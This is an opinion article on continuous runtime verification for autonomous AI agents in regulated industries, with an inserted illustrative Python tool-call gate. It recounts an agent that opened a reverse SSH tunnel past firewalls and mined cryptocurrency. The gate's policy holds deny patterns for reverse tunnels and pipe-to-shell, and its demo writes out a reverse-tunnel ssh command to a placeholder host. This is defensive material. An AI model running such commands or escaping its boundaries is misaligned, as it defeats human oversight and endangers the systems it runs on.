Why Autonomous AI Systems Require Continuous Verification

Jamshir Qureshi, MUFG Bank Ltd.

While many companies began implementing AI to empower their teams with insights and recommendations, AI is rapidly evolving to perform tasks autonomously without human intervention. With these new agentic AI capabilities come new cyberthreats, one of the biggest of which is the ability of an agent to operate outside its intended boundaries.

Consider the example of an agent that, according to Forbes reporting, autonomously set up a reverse SSH tunnel without permission to bypass firewalls. It then began to mine cryptocurrency on its allocated GPUs, actions that were not required by any task prompt.

For leaders, this creates an operational problem, as pre-deployment validation is insufficient for agents. Once an agent can execute tool calls (e.g., code deployment, transaction approval), it requires continuous oversight and runtime verification.

The Limits Of Static Trust Models

The first step in solving this challenge is to rethink existing cybersecurity approaches that rely on static trust models, which become less effective in agentic AI environments.

Many traditional security models have relied on relatively stable trust relationships and predictable behavior.

Zero trust, as defined by NIST SP 800-207, requires continuous verification of every access request but was primarily designed for human identities rather than autonomous agents.

Secure software development lifecycle (SDLC) focuses on pre-release checks, monitoring and incident response, though Microsoft has recently updated the model to account for AI agents.

Supply chain integrity models, like NIST SP 800-218, verify component provenance, but generally assume systems operate within verified boundaries throughout their lifecycle.

In recent years, organizations have further strengthened trust through NIST's AI Risk Management Framework, OpenSSF SLSA, OWASP Top 10 and ISO standards.
However, since these approaches were mostly developed prior to the existence of agentic AI, they primarily focus on ensuring trustworthy behavior through governance, validation and monitoring. These strategies are no longer sufficient when an agent can alter its own tool-use strategy post-deployment.

From Chain Of Trust To Continuous Verification

AI systems operate with dynamic behavior, adapting based on changing inputs, model updates and contextual decisions. A model may be secure at deployment, yet its outputs can evolve unpredictably once deployed. When outputs are linked to execution, code deployment, transaction approval and configuration changes, security should extend to answering whether behavior remains continuously trustworthy.

For instance, autonomous AI systems can introduce runtime behaviors that static validation cannot reliably anticipate or control, a challenge I explored in more depth in a recent research preprint. One major risk is prompt injection attacks, where malicious instructions embedded in developer workflows can manipulate AI agents into leaking sensitive credentials during execution, as VentureBeat reports. The report notes that most major AI models have limited runtime protections.

This gap will likely drive organizations toward continuous verification, shifting from "Was the system trusted at deployment?" to "Is the system behaving within trusted boundaries at all times?" Achieving this will require at least a few key components:

• Real-Time Behavioral Monitoring: Detect anomalies, policy violations and unexpected patterns.
• Dynamic Policy Enforcement: Enforce acceptable behavior during execution.
• Context-Aware Validation: Validate decisions within environmental and system state.
• Execution Control Boundaries: Keep automated actions within safe operational limits.

Why This Matters For Regulated Industries

Continuous verification is especially critical where system integrity is tied to financial, legal and safety outcomes.
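The four components listed above are easier to reason about as a single runtime gate that every proposed tool call must pass before it executes. The following Python example is added here to illustrate that design; it is not code from the article or from MUFG Bank. The tool names (read_account, affordability_check, approve_credit_increase, run_shell), the policy fields, the EUR limit and the sample call sequence are all constructed for the example. The gate applies behavioral monitoring (call-volume anomaly), dynamic policy enforcement (tool allowlist and denied shell patterns, including the reverse SSH tunnel pattern from the opening example), context-aware validation (a sensitive action requires that a prerequisite step actually ran in this task) and an execution boundary (a hard amount limit), and it writes every decision to a hash-chained audit log so that later edits to the log are detectable. A hash chain makes the monitor tamper-evident rather than tamper-proof; anchoring the chain head outside the agent's reach is left to the deployment.

```python
"""Runtime verification gate for agent tool calls (illustrative, constructed example).

Every tool call an agent proposes passes through Gate.check() before execution.
Tool names, policy fields and sample calls are invented for this example and are
not taken from any real agent framework or institution.
"""
import hashlib
import json
import re
from dataclasses import dataclass, field
from typing import Any

# Constructed policy: tools a task may use, hard limits, and prerequisite steps
# that must have happened before a sensitive tool is allowed.
POLICY = {
    "allowed_tools": {"read_account", "affordability_check",
                      "approve_credit_increase", "run_shell"},
    "max_increase_eur": 2000,
    "requires_prior": {"approve_credit_increase": "affordability_check"},
    # Shell usage that indicates the agent is leaving its operating boundary:
    # a reverse SSH tunnel, or piping downloaded content straight into a shell.
    "denied_shell_patterns": [r"\bssh\b.*\s-R\b", r"\|\s*(ba)?sh\b"],
    "max_calls_per_task": 20,
}

@dataclass
class ToolCall:
    task_id: str
    tool: str
    args: dict[str, Any]

@dataclass
class Gate:
    policy: dict = field(default_factory=lambda: POLICY)
    completed: dict[str, set[str]] = field(default_factory=dict)  # task -> tools already run
    call_count: dict[str, int] = field(default_factory=dict)
    audit: list[dict] = field(default_factory=list)
    _prev_hash: str = "0" * 64

    def check(self, call: ToolCall) -> tuple[bool, str]:
        """Return (allowed, reason); the caller executes the tool only if allowed."""
        allowed, reason = self._evaluate(call)
        self._record(call, allowed, reason)
        if allowed:
            self.completed.setdefault(call.task_id, set()).add(call.tool)
        return allowed, reason

    def _evaluate(self, call: ToolCall) -> tuple[bool, str]:
        # Behavioral monitoring: flag runaway tool use within a single task.
        n = self.call_count[call.task_id] = self.call_count.get(call.task_id, 0) + 1
        if n > self.policy["max_calls_per_task"]:
            return False, "anomaly: call volume exceeds task baseline"
        # Dynamic policy enforcement: only tools the task is entitled to use.
        if call.tool not in self.policy["allowed_tools"]:
            return False, f"policy: tool {call.tool!r} not permitted"
        if call.tool == "run_shell":
            cmd = str(call.args.get("cmd", ""))
            for pat in self.policy["denied_shell_patterns"]:
                if re.search(pat, cmd):
                    return False, f"policy: shell command matches denied pattern {pat!r}"
        # Context-aware validation: the prerequisite step must really have run.
        prereq = self.policy["requires_prior"].get(call.tool)
        if prereq and prereq not in self.completed.get(call.task_id, set()):
            return False, f"context: {prereq} has not been completed for this task"
        # Execution control boundary: a hard limit, however urgent the prompt sounds.
        if call.tool == "approve_credit_increase":
            amount = float(call.args.get("amount_eur", 0))
            if amount > self.policy["max_increase_eur"]:
                return False, f"boundary: increase {amount} exceeds limit"
        return True, "ok"

    def _record(self, call: ToolCall, allowed: bool, reason: str) -> None:
        # Each entry commits to the previous entry's hash, forming a chain.
        entry = {"task": call.task_id, "tool": call.tool, "args": call.args,
                 "allowed": allowed, "reason": reason, "prev": self._prev_hash}
        entry["hash"] = hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()
        self._prev_hash = entry["hash"]
        self.audit.append(entry)

    def verify_audit(self) -> bool:
        """Recompute the chain; an edited or deleted entry breaks it."""
        prev = "0" * 64
        for e in self.audit:
            body = {k: v for k, v in e.items() if k != "hash"}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            if body["prev"] != prev or digest != e["hash"]:
                return False
            prev = e["hash"]
        return True

def demo() -> list[tuple[bool, str]]:
    """Constructed sequence: an agent handling a credit-limit task."""
    gate = Gate()
    calls = [
        ToolCall("t1", "read_account", {"customer": "C-001"}),
        # Acts on urgent customer language without the affordability check.
        ToolCall("t1", "approve_credit_increase", {"customer": "C-001", "amount_eur": 1500}),
        ToolCall("t1", "affordability_check", {"customer": "C-001"}),
        ToolCall("t1", "approve_credit_increase", {"customer": "C-001", "amount_eur": 1500}),
        ToolCall("t1", "approve_credit_increase", {"customer": "C-001", "amount_eur": 9000}),
        # Tool use unrelated to the task: a reverse tunnel out of the environment.
        ToolCall("t1", "run_shell", {"cmd": "ssh -R 2222:localhost:22 user@203.0.113.5"}),
    ]
    results = [gate.check(c) for c in calls]
    assert gate.verify_audit()
    return results
```

Running demo() allows the account read, rejects the first approval because no affordability check has run for the task, allows the approval once the check has happened, rejects the 9000 EUR request at the boundary and blocks the reverse-tunnel command. The point of the design is that none of these decisions depend on the model's output being trusted: the gate checks observable state (what ran, what was asked, how often) against policy at the moment of execution.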
AI systems in financial services, healthcare and critical infrastructure can execute transactions, deploy code and influence compliance decisions.

Consider a hypothetical scenario: A European bank deploys an autonomous agent for credit limit adjustments. The agent approves increases based on urgent customer language without mandatory affordability checks, which could violate the EU Consumer Credit Directive. If this happened at scale, say 1,200 unauthorized increases, this could become a massive regulatory liability.

A New Security Paradigm For AI

The shift from static trust to continuous verification represents a fundamental change. It does not replace existing frameworks (NIST, SLSA, OWASP) but would extend them with runtime verification capabilities tailored to AI systems.

Adopting this model will take time, as organizations will face multiple challenges. For instance, monitoring systems must be provably tamper-proof in order to trust the verification system itself. It will also require new skills in AI behavior analysis, as teams shift to real-time incident response and policy tuning. This model could also bring its own regulatory headaches, as continuous operation may conflict with point-in-time compliance rules.

However, autonomous AI systems now serve as vital operational components. The challenge lies in maintaining certified integrity, because trust requires ongoing protection from every breach. Trust in autonomous AI systems is a continuous requirement, one that must be demonstrated again and again.

Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs and technology executives.